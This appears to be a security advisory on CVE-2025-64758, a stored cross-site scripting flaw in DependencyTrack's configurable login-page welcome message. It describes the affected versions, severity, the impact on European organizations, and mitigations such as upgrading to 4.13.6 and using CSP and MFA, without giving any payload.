CVE-2025-64758 is a Cross-Site Scripting (CWE-79) vulnerability affecting the frontend component of DependencyTrack, an open-source software composition analysis platform widely used for managing software supply chain risks. Since version 4.12.0, DependencyTrack allows users with SYSTEM_CONFIGURATION permissions to set a custom HTML "welcome message" displayed on the login page for branding. However, in versions prior to 4.13.6, this HTML content was not properly sanitized before rendering, enabling injection and execution of arbitrary JavaScript code in the context of the login page. Exploitation requires an attacker to have administrator-level access to configure the malicious welcome message. When a user visits the login page, the injected script executes, potentially stealing session tokens, performing actions on behalf of the user, or delivering further payloads. The vulnerability affects versions from 4.12.0 up to but not including 4.13.6, and was publicly disclosed on November 17, 2025. The CVSS v3.1 base score is 4.8 (medium severity), reflecting network attack vector, low attack complexity, high privileges required, and user interaction needed. No known active exploits have been reported. The issue has been resolved by proper HTML sanitization in version 4.13.6. This vulnerability is significant because DependencyTrack is often used in environments managing critical software supply chains, where trust and integrity are paramount.

For European organizations, this vulnerability poses a risk primarily to the confidentiality and integrity of user sessions and potentially sensitive configuration data within DependencyTrack. If exploited, malicious scripts could hijack administrator sessions or manipulate the application interface, undermining trust in the software supply chain risk management process. This could lead to unauthorized access to vulnerability data, component inventories, or risk assessments, which are critical for compliance with regulations such as the EU Cybersecurity Act and NIS Directive. Although the vulnerability does not directly impact availability, the indirect consequences of compromised integrity and confidentiality could disrupt software supply chain security workflows. Organizations with stringent software supply chain security requirements, especially in sectors like finance, healthcare, and critical infrastructure, are at higher risk. The requirement for administrator privileges limits the attack surface but insider threats or compromised admin accounts could be leveraged. The lack of known exploits reduces immediate risk but does not eliminate the potential for targeted attacks.

European organizations should immediately upgrade DependencyTrack to version 4.13.6 or later to ensure the vulnerability is patched. Until upgrade, restrict SYSTEM_CONFIGURATION permissions strictly to trusted administrators and monitor for unusual configuration changes, especially to the welcome message. Implement Content Security Policy (CSP) headers on the DependencyTrack web server to limit the execution of unauthorized scripts. Conduct regular audits of the welcome message content and other configurable HTML fields to detect malicious code. Employ multi-factor authentication (MFA) for administrator accounts to reduce the risk of credential compromise. Monitor logs for suspicious activity related to configuration changes or login page access. Educate administrators about the risks of injecting untrusted HTML content. Finally, integrate DependencyTrack usage within a broader security monitoring framework to detect anomalous behavior that could indicate exploitation attempts.